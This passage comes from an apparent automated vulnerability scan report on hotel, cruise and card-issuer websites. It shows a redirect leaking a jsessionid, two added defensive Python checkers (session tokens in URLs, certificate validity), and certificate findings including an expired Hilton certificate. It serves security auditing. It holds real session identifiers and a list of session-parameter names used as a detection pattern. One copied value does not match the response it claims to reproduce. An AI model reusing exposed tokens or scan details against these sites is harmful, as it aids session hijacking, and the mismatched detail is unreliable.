Server: Apache
Location: http://www1.hilton.com/fr/hi/index.do;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041801668,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149&
X-Powered-By: Servlet/2.5 JSP/2.1
Cache-Control: max-age=86400
Expires: Tue, 04 Oct 2011 13:02:24 GMT
Content-Type: text/html
Date: Mon, 03 Oct 2011 13:02:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 571

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://www1.hilton.com/fr/hi/index.do&#59;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041801668,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149&amp;">http://www1.hilton.com/fr/hi/index.do&#59;jsessionid=4E9B21AE664381D1B53DE8378483FB39.etc13?xch=1041801668,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149&amp;</a>
...[SNIP]...
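The check behind findings 9.35 to 9.37, written out as an added example (it is not code from the report or from the scanner that produced it): pull every URL out of a 302 response, both the Location header and the body's anchors, decode HTML entities, and report any jsessionid-style parameter carried in the path or query string. The response it scans is a constructed copy of the 9.35 exchange above, with one token-free link added; the parameter-name list and the function names are the example's own choices.

```python
"""Flag URLs in an HTTP response that carry a session token.

Added example, not code from the XSS.CX report: it re-implements the kind
of check behind the 'Session token in URL' findings 9.35 to 9.37 and runs
it over a constructed copy of the 9.35 response (status line, Location
header and the body's anchor; the jsessionid value and xch parameter are
the ones the report shows).  SESSION_PARAM_NAMES and the function names are
this example's own choices.
"""
import re
from html import unescape
from urllib.parse import parse_qsl, urlsplit

# Parameter names that commonly carry a session identifier, whether as a
# Java-style ';name=value' path parameter or as a query-string parameter.
SESSION_PARAM_NAMES = {
    "jsessionid", "phpsessid", "aspsessionid", "asp.net_sessionid",
    "sessionid", "session_id", "sid", "cfid", "cftoken",
}

TOKEN = "4E9B21AE664381D1B53DE8378483FB39.etc13"
XCH = "1041801034,QGJVTJwfpmh09MLv8vspfWvtjhcJbMDlLfc1VvRs9zwlB2KJGl0Q!672724623!1317646367149"

# Constructed from finding 9.35; the body keeps the report's HTML-entity
# encoding of ';' (&#59;) and '&' (&amp;) and adds one token-free link.
SAMPLE_RESPONSE = (
    "HTTP/1.1 302 Moved Temporarily\r\n"
    "Server: Apache\r\n"
    f"Location: http://waldorfastoria.com/;jsessionid={TOKEN}?xch={XCH}&\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
    "<html><body><p>This document you requested has moved temporarily.</p>\n"
    f"<p>It's now at <a href=\"http://waldorfastoria.com/&#59;jsessionid={TOKEN}?xch={XCH}&amp;\">here</a></p>\n"
    "<p><a href=\"http://www3.hilton.com/en_US/wa/index.do\">no token</a></p></body></html>"
)

HREF_RE = re.compile(r'href\s*=\s*["\']([^"\']+)["\']', re.IGNORECASE)


def session_tokens_in_url(url):
    """Return [(name, value)] for session-looking parameters found in `url`.

    Checks both the path-parameter form (/index.do;jsessionid=...) and the
    query-string form (?jsessionid=...); names are matched case-insensitively.
    """
    parts = urlsplit(url)
    found = []
    for seg in parts.path.split(";")[1:]:          # ';name=value' path parameters
        name, _, value = seg.partition("=")
        if name.lower() in SESSION_PARAM_NAMES and value:
            found.append((name, value))
    for name, value in parse_qsl(parts.query):      # ?name=value query parameters
        if name.lower() in SESSION_PARAM_NAMES:
            found.append((name, value))
    return found


def scan_response(raw):
    """Return one finding per URL in `raw` that embeds a session token.

    URLs come from the Location header and from every href in the body.
    Entities are decoded before checking so that '&#59;jsessionid=' is seen
    as the ';jsessionid=' path parameter it becomes in the browser.
    """
    head, _, body = raw.partition("\r\n\r\n")
    urls = []
    for line in head.split("\r\n")[1:]:             # skip the status line
        name, _, value = line.partition(":")
        if name.strip().lower() == "location":
            urls.append(("Location header", value.strip()))
    for m in HREF_RE.finditer(body):
        urls.append(("body href", unescape(m.group(1))))
    findings = []
    for where, url in urls:
        for name, value in session_tokens_in_url(url):
            findings.append({"where": where, "param": name, "token": value, "url": url})
    return findings


if __name__ == "__main__":
    for f in scan_response(SAMPLE_RESPONSE):
        print(f"{f['where']}: {f['param']}={f['token']}")
```

Run against the sample, the scanner reports the same token twice, once from the Location header and once from the body anchor, and nothing for the token-free link; decoding entities first matters because the body encodes the `;` separator as `&#59;`, which a naive string match on `;jsessionid=` would miss.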

10. SSL certificate
There are 8 instances of this issue:

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.
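The three requirements named above (hostname match, trusted issuer, validity for the current date) as a check in code. This is an added example, not the scanner's logic: the certificate records are built from the names and dates in findings 10.1 and 10.4 below (converted from CDT to UTC), the scan time is the Date header of the 9.35 response above, and the Cert record, TRUST_ANCHORS and the name-walking notion of trust are this example's simplifying assumptions.

```python
"""Evaluate the three certificate requirements: hostname match, trusted
issuer, and validity for the current date.

Added example, not part of the XSS.CX report and not the scanner's own logic.
Subject names, issuers and validity periods are copied from findings 10.1 and
10.4 (times converted from CDT to UTC); the Cert record, the function names
and TRUST_ANCHORS are this example's assumptions.  Issuer trust is judged by
walking issuer names up to an anchor, a simplification of what a real
verifier does (it also checks each signature, key usage and revocation).
"""
from datetime import datetime, timezone
from typing import NamedTuple


class Cert(NamedTuple):
    subject: str            # name the certificate is issued to (may be a wildcard)
    issuer: str             # name of the issuing CA
    not_before: datetime
    not_after: datetime


# Assumed trust store for this example; a real one holds root certificates.
TRUST_ANCHORS = {
    "AddTrust External CA Root",
    "GTE CyberTrust Global Root",
    "VeriSign Class 3 Secure Server CA",
}


def hostname_matches(pattern, hostname):
    """RFC 6125-style match: exact, or '*' as the whole leftmost label only.

    '*.hilton.com' matches 'secure3.hilton.com' but neither 'a.b.hilton.com'
    nor 'hilton.com'; a bare '*.com' is rejected as too broad.
    """
    pattern, hostname = pattern.lower().rstrip("."), hostname.lower().rstrip(".")
    if pattern == hostname:
        return True
    p_labels, h_labels = pattern.split("."), hostname.split(".")
    if p_labels[0] != "*" or len(p_labels) < 3 or len(p_labels) != len(h_labels):
        return False
    return p_labels[1:] == h_labels[1:]


def chain_is_trusted(chain):
    """Walk from the leaf through the presented issuers until an anchor is hit."""
    by_subject = {c.subject: c for c in chain}
    cur, seen = chain[0], set()
    while cur.issuer not in TRUST_ANCHORS:
        if cur.issuer in seen or cur.issuer not in by_subject:
            return False            # chain ends (or loops) before reaching an anchor
        seen.add(cur.issuer)
        cur = by_subject[cur.issuer]
    return True


def check_certificate(chain, hostname, now):
    """Return the failed requirements for chain[0]; an empty list means it passes."""
    leaf = chain[0]
    problems = []
    if not hostname_matches(leaf.subject, hostname):
        problems.append("hostname mismatch")
    if not chain_is_trusted(chain):
        problems.append("issuer not trusted")
    if now < leaf.not_before:
        problems.append("not yet valid")
    elif now > leaf.not_after:
        problems.append("expired")
    return problems


def utc(*args):
    """Build a timezone-aware UTC datetime from year, month, day, h, m, s."""
    return datetime(*args, tzinfo=timezone.utc)


# Constructed from finding 10.1 (only the leaf certificate was recorded).
SECURE2 = [
    Cert("secure2.hilton.com", "VeriSign Class 3 Secure Server CA",
         utc(2008, 5, 9, 0, 0, 0), utc(2010, 5, 11, 23, 59, 59)),
]
# Constructed from finding 10.4: wildcard leaf plus its COMODO intermediate.
SECURE3 = [
    Cert("*.hilton.com", "COMODO High-Assurance Secure Server CA",
         utc(2011, 8, 3, 0, 0, 0), utc(2012, 9, 12, 23, 59, 59)),
    Cert("COMODO High-Assurance Secure Server CA", "AddTrust External CA Root",
         utc(2010, 4, 16, 0, 0, 0), utc(2020, 5, 30, 10, 48, 38)),
]
# Time of the scan, taken from the Date header of the 9.35 response above.
SCAN_TIME = utc(2011, 10, 3, 13, 2, 12)

if __name__ == "__main__":
    for name, chain in (("secure2.hilton.com", SECURE2), ("secure3.hilton.com", SECURE3)):
        print(name, check_certificate(chain, name, SCAN_TIME) or ["ok"])
```

With the scan time of October 2011, the 10.1 record fails only on the date (it expired in May 2010), while the 10.4 wildcard passes for secure3.hilton.com and fails the hostname check for a two-level name such as a.b.hilton.com; dropping the intermediate from the presented chain turns the 10.4 case into an untrusted-issuer failure, which is the other way a certificate that looks fine in isolation fails in the browser.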



10.1. https://secure2.hilton.com/

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://secure2.hilton.com
Path:   /

Issue detail

Problems were identified with the server's SSL certificate. From the dates below, the certificate had expired well before the scan: it was valid only until Tue May 11 18:59:59 CDT 2010, while the responses in this report are dated 03 Oct 2011.

The server presented the following certificate:

Issued to:  secure2.hilton.com
Issued by:  VeriSign Class 3 Secure Server CA
Valid from:  Thu May 08 19:00:00 CDT 2008
Valid to:  Tue May 11 18:59:59 CDT 2010

10.2. https://wwwa.applyonlinenow.com/

Summary

Severity:   Medium
Confidence:   Certain
Host:   https://wwwa.applyonlinenow.com
Path:   /

Issue detail

The following problem was identified with the server's SSL certificate:

The server presented the following certificate:

Issued to:  wwwa.applyonlinenow.com
Issued by:  VeriSign Class 3 Secure Server CA - G3
Valid from:  Wed Aug 10 19:00:00 CDT 2011
Valid to:  Mon Sep 03 18:59:59 CDT 2012

10.3. https://secure.hilton.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.hilton.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  secure.hilton.com,ST=Tennessee
Issued by:  Akamai Subordinate CA 3
Valid from:  Thu Nov 18 09:27:10 CST 2010
Valid to:  Fri Nov 18 09:27:10 CST 2011

Certificate chain #1

Issued to:  Akamai Subordinate CA 3
Issued by:  GTE CyberTrust Global Root
Valid from:  Thu May 11 10:32:00 CDT 2006
Valid to:  Sat May 11 18:59:00 CDT 2013

Certificate chain #2

Issued to:  GTE CyberTrust Global Root
Issued by:  GTE CyberTrust Global Root
Valid from:  Wed Aug 12 19:29:00 CDT 1998
Valid to:  Mon Aug 13 18:59:00 CDT 2018

10.4. https://secure3.hilton.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure3.hilton.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.hilton.com
Issued by:  COMODO High-Assurance Secure Server CA
Valid from:  Tue Aug 02 19:00:00 CDT 2011
Valid to:  Wed Sep 12 18:59:59 CDT 2012

Certificate chain #1

Issued to:  COMODO High-Assurance Secure Server CA
Issued by:  AddTrust External CA Root
Valid from:  Thu Apr 15 19:00:00 CDT 2010
Valid to:  Sat May 30 05:48:38 CDT 2020

Certificate chain #2

Issued to:  AddTrust External CA Root
Issued by:  AddTrust External CA Root
Valid from:  Tue May 30 05:48:38 CDT 2000
Valid to:  Sat May 30 05:48:38 CDT 2020

Certificate chain #3

Issued to:  AddTrust External CA Root
Issued by:  AddTrust External CA Root
Valid from:  Tue May 30 05:48:38 CDT 2000
Valid to:  Sat May 30 05:48:38 CDT 2020

10.5. https://www.marriott.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.marriott.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.marriott.com,ST=MARYLAND
Issued by:  Akamai Subordinate CA 3
Valid from:  Fri Sep 16 07:35:04 CDT 2011
Valid to:  Sun Sep 16 07:35:04 CDT 2012

Certificate chain #1

Issued to:  Akamai Subordinate CA 3
Issued by:  GTE CyberTrust Global Root
Valid from:  Thu May 11 10:32:00 CDT 2006
Valid to:  Sat May 11 18:59:00 CDT 2013

Certificate chain #2

Issued to:  GTE CyberTrust Global Root
Issued by:  GTE CyberTrust Global Root
Valid from:  Wed Aug 12 19:29:00 CDT 1998
Valid to:  Mon Aug 13 18:59:00 CDT 2018

10.6. https://www.marriottregistry.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.marriottregistry.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.marriottregistry.com
Issued by:  GeoTrust SSL CA
Valid from:  Wed Aug 11 15:46:29 CDT 2010
Valid to:  Wed Sep 12 20:29:51 CDT 2012

Certificate chain #1

Issued to:  GeoTrust SSL CA
Issued by:  GeoTrust Global CA
Valid from:  Fri Feb 19 16:39:26 CST 2010
Valid to:  Tue Feb 18 16:39:26 CST 2020

Certificate chain #2

Issued to:  GeoTrust Global CA
Issued by:  GeoTrust Global CA
Valid from:  Mon May 20 23:00:00 CDT 2002
Valid to:  Fri May 20 23:00:00 CDT 2022

10.7. https://www2.ncl.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www2.ncl.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.ncl.com,ST=FLORIDA
Issued by:  Akamai Subordinate CA 3
Valid from:  Fri Aug 05 07:18:26 CDT 2011
Valid to:  Sun Aug 05 07:18:26 CDT 2012

Certificate chain #1

Issued to:  Akamai Subordinate CA 3
Issued by:  GTE CyberTrust Global Root
Valid from:  Thu May 11 10:32:00 CDT 2006
Valid to:  Sat May 11 18:59:00 CDT 2013

Certificate chain #2

Issued to:  GTE CyberTrust Global Root
Issued by:  GTE CyberTrust Global Root
Valid from:  Wed Aug 12 19:29:00 CDT 1998
Valid to:  Mon Aug 13 18:59:00 CDT 2018

10.8. https://www201.americanexpress.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www201.americanexpress.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www201.americanexpress.com
Issued by:  VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:  Wed Jul 27 19:00:00 CDT 2011
Valid to:  Wed Aug 15 18:59:59 CDT 2012

Certificate chain #1

Issued to:  VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Mon Nov 07 17:59:59 CST 2016

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Sun Nov 07 17:59:59 CST 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Wed Aug 02 18:59:59 CDT 2028

11. Cookie scoped to parent domain
There are 82 instances of this issue: